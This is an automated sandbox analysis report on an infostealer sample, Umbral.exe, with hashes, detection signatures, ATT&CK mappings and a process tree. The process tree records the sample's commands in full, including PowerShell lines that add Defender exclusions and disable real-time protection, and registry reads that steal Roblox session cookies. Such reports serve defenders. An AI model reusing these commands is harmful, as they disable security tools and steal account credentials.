Analysis
-
max time kernel
14s -
max time network
17s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
10-11-2024 16:32
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
468453ade106242c46c6ebc95df5e233
-
SHA1
901875b848f10048764fe07c0c6ac7db7c33f551
-
SHA256
2a92c314a04c06f608c96a0736b3ea76179085295b700019c9db0de2085e9d7d
-
SHA512
4d351c895e3456ab926ff13c03f779f4804f8011085e311dcd16825f87ec6290b37d52a555e187ab748da40998301c8258a8c2c74d74640c795574590fa374eb
-
SSDEEP
6144:lloZM9rIkd8g+EtXHkv/iD4hEnG1DA0r2SjVg8Zk5b8e1mhxi:noZOL+EP8hEnG1DA0r2SjVg8Zw8o
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/4564-1-0x000001BA97B90000-0x000001BA97BD0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2084 powershell.exe 868 powershell.exe 1152 powershell.exe 1388 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1660 cmd.exe 4500 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3520 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4500 PING.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2084 powershell.exe 2084 powershell.exe 1152 powershell.exe 1152 powershell.exe 1388 powershell.exe 1388 powershell.exe 4836 powershell.exe 4836 powershell.exe 940 wmic.exe 940 wmic.exe 940 wmic.exe 940 wmic.exe 4716 wmic.exe 4716 wmic.exe 4716 wmic.exe 4716 wmic.exe 3000 wmic.exe 3000 wmic.exe 3000 wmic.exe 3000 wmic.exe 868 powershell.exe 868 powershell.exe 3520 wmic.exe 3520 wmic.exe 3520 wmic.exe 3520 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4564 Umbral.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeIncreaseQuotaPrivilege 2084 powershell.exe Token: SeSecurityPrivilege 2084 powershell.exe Token: SeTakeOwnershipPrivilege 2084 powershell.exe Token: SeLoadDriverPrivilege 2084 powershell.exe Token: SeSystemProfilePrivilege 2084 powershell.exe Token: SeSystemtimePrivilege 2084 powershell.exe Token: SeProfSingleProcessPrivilege 2084 powershell.exe Token: SeIncBasePriorityPrivilege 2084 powershell.exe Token: SeCreatePagefilePrivilege 2084 powershell.exe Token: SeBackupPrivilege 2084 powershell.exe Token: SeRestorePrivilege 2084 powershell.exe Token: SeShutdownPrivilege 2084 powershell.exe Token: SeDebugPrivilege 2084 powershell.exe Token: SeSystemEnvironmentPrivilege 2084 powershell.exe Token: SeRemoteShutdownPrivilege 2084 powershell.exe Token: SeUndockPrivilege 2084 powershell.exe Token: SeManageVolumePrivilege 2084 powershell.exe Token: 33 2084 powershell.exe Token: 34 2084 powershell.exe Token: 35 2084 powershell.exe Token: 36 2084 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeIncreaseQuotaPrivilege 940 wmic.exe Token: SeSecurityPrivilege 940 wmic.exe Token: SeTakeOwnershipPrivilege 940 wmic.exe Token: SeLoadDriverPrivilege 940 wmic.exe Token: SeSystemProfilePrivilege 940 wmic.exe Token: SeSystemtimePrivilege 940 wmic.exe Token: SeProfSingleProcessPrivilege 940 wmic.exe Token: SeIncBasePriorityPrivilege 940 wmic.exe Token: SeCreatePagefilePrivilege 940 wmic.exe Token: SeBackupPrivilege 940 wmic.exe Token: SeRestorePrivilege 940 wmic.exe Token: SeShutdownPrivilege 940 wmic.exe Token: SeDebugPrivilege 940 wmic.exe Token: SeSystemEnvironmentPrivilege 940 wmic.exe Token: SeRemoteShutdownPrivilege 940 wmic.exe Token: SeUndockPrivilege 940 wmic.exe Token: SeManageVolumePrivilege 940 wmic.exe Token: 33 940 wmic.exe Token: 34 940 wmic.exe Token: 35 940 wmic.exe Token: 36 940 wmic.exe Token: SeIncreaseQuotaPrivilege 940 wmic.exe Token: SeSecurityPrivilege 940 wmic.exe Token: SeTakeOwnershipPrivilege 940 wmic.exe Token: SeLoadDriverPrivilege 940 wmic.exe Token: SeSystemProfilePrivilege 940 wmic.exe Token: SeSystemtimePrivilege 940 wmic.exe Token: SeProfSingleProcessPrivilege 940 wmic.exe Token: SeIncBasePriorityPrivilege 940 wmic.exe Token: SeCreatePagefilePrivilege 940 wmic.exe Token: SeBackupPrivilege 940 wmic.exe Token: SeRestorePrivilege 940 wmic.exe Token: SeShutdownPrivilege 940 wmic.exe Token: SeDebugPrivilege 940 wmic.exe Token: SeSystemEnvironmentPrivilege 940 wmic.exe Token: SeRemoteShutdownPrivilege 940 wmic.exe Token: SeUndockPrivilege 940 wmic.exe Token: SeManageVolumePrivilege 940 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4564 wrote to memory of 1920 4564 Umbral.exe 84 PID 4564 wrote to memory of 1920 4564 Umbral.exe 84 PID 4564 wrote to memory of 2084 4564 Umbral.exe 86 PID 4564 wrote to memory of 2084 4564 Umbral.exe 86 PID 4564 wrote to memory of 1152 4564 Umbral.exe 89 PID 4564 wrote to memory of 1152 4564 Umbral.exe 89 PID 4564 wrote to memory of 1388 4564 Umbral.exe 91 PID 4564 wrote to memory of 1388 4564 Umbral.exe 91 PID 4564 wrote to memory of 4836 4564 Umbral.exe 93 PID 4564 wrote to memory of 4836 4564 Umbral.exe 93 PID 4564 wrote to memory of 940 4564 Umbral.exe 95 PID 4564 wrote to memory of 940 4564 Umbral.exe 95 PID 4564 wrote to memory of 4716 4564 Umbral.exe 98 PID 4564 wrote to memory of 4716 4564 Umbral.exe 98 PID 4564 wrote to memory of 3000 4564 Umbral.exe 100 PID 4564 wrote to memory of 3000 4564 Umbral.exe 100 PID 4564 wrote to memory of 868 4564 Umbral.exe 102 PID 4564 wrote to memory of 868 4564 Umbral.exe 102 PID 4564 wrote to memory of 3520 4564 Umbral.exe 106 PID 4564 wrote to memory of 3520 4564 Umbral.exe 106 PID 4564 wrote to memory of 1660 4564 Umbral.exe 109 PID 4564 wrote to memory of 1660 4564 Umbral.exe 109 PID 1660 wrote to memory of 4500 1660 cmd.exe 111 PID 1660 wrote to memory of 4500 1660 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1920 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Views/modifies file attributes
PID:1920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4500
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD5b8e50b3ccd57a2aeb68434d7199c85d9
SHA192236e535a13bcfbfabcb0ec9953f1805e84fc4d
SHA256ac8499b85d6a6b42251afd44955b7227b98949510d2dd6e05040bf14cbd5a66a
SHA51277f7d855380ea10d20ea2da82a13a4255e7b5767ed0bbc764e2a2f80ca90fd0c4fa2a58517e4c2d281435b7728946db05a73dfa8cb1e4e420a6a9133061939e8
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5beaa733206e6159a16f84258a3868738
SHA15d973073d1fb8bf3b4654ad9172b1519c5ee3ce7
SHA256d5387e07c332114cd393c847f7e0fe5108ec208798391a756fc1298daab786dd
SHA5120fa50d16101a53ff2c43c62e370462feeae1283b6c33167d1ca9e293d2373f00e16f289f07caabe5789aa633c3a622bca4d3e499fd6af38001a3dbcee454b73f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82